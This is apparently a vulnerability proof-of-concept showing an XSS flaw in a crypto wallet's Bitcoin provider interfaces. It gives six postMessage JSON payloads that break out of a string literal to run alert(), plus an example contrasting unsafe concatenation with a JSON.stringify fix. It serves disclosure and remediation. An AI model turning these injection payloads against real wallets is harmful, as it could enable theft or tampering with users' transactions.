🎯 Attack Vector: bundle.data XSS
This PoC exploits an XSS vulnerability: user-controlled data from the rawtx field
of a postMessage payload is stored in bundle.data and concatenated directly into
JavaScript, without sanitization, in multiple Bitcoin protocol handlers.
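The concatenation flaw described above next to a hardened form, as an added example that is not the wallet's code or part of the original PoC. The function names and the `callback("<data>")` script shape are assumed stand-ins for the real handlers; the sample rawtx value is the first payload on this page.

```javascript
// Added illustration. The handler shape (a generated script that calls
// callback("<data>")) is an assumption, not the wallet's real source.

// Vulnerable pattern: bundle.data is pasted between double quotes.
function buildScriptUnsafe(bundle) {
  return 'callback("' + bundle.data + '");';
}

// Hardened pattern: JSON.stringify emits a fully escaped string literal.
// "<", U+2028 and U+2029 are escaped as well so the literal also survives
// being placed inside an HTML <script> element.
function buildScriptSafe(bundle) {
  const literal = JSON.stringify(String(bundle.data))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return 'callback(' + literal + ');';
}

// Evaluate a generated script against stubs and record every call made.
function run(script) {
  const calls = [];
  const stub = (name) => (value) => calls.push(name + ':' + value);
  new Function('callback', 'alert', script)(stub('callback'), stub('alert'));
  return calls;
}

// rawtx value taken from the first payload on this page.
const bundle = { data: "\"); alert('XSS via window.bitcoin.signPsbt!'); //" };

const unsafeCalls = run(buildScriptUnsafe(bundle)); // data executed as code
const safeCalls = run(buildScriptSafe(bundle));     // data stays data
console.log({ unsafeCalls, safeCalls });
```

In the unsafe build the stubbed `alert` is invoked in addition to `callback`; in the hardened build only `callback` runs and it receives the rawtx string unchanged.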
window.bitcoin (Main Bitcoin Interface)
🔸 signPsbt Method (XSS via bundle.data)
{
  "id": "123",
  "name": "pushPsbt",
  "object": {
    "rawtx": "\"); alert('XSS via window.bitcoin.signPsbt!'); //"
  }
}
🔸 signPsbts Method (XSS via bundle.data)
{
  "id": "123",
  "name": "pushPsbt",
  "object": {
    "rawtx": "\"); alert('XSS via window.bitcoin.signPsbts!'); //"
  }
}
🔸 Default Case (XSS via bundle.data)
{
  "id": "123",
  "name": "pushPsbt",
  "object": {
    "rawtx": "\"); alert('XSS via window.bitcoin.default!'); //"
  }
}
window.bitcoinTestnet (Testnet Interface)
🔸 signPsbt Method (XSS via bundle.data)
{
  "id": "123",
  "name": "pushPsbt",
  "object": {
    "rawtx": "\"); alert('XSS via window.bitcoinTestnet.signPsbt!'); //"
  }
}
window.bitcoinSignet (Signet Interface)
🔸 signPsbt Method (XSS via bundle.data)
{
  "id": "123",
  "name": "pushPsbt",
  "object": {
    "rawtx": "\"); alert('XSS via window.bitcoinSignet.signPsbt!'); //"
  }
}
window.okxBtcJSBridge (Fractal Bitcoin Interface)
🔸 signPsbt Method (XSS via bundle.data)
{
  "id": "123",
  "name": "pushPsbt",
  "object": {
    "rawtx": "\"); alert('XSS via window.okxBtcJSBridge.signPsbt!'); //"
  }
}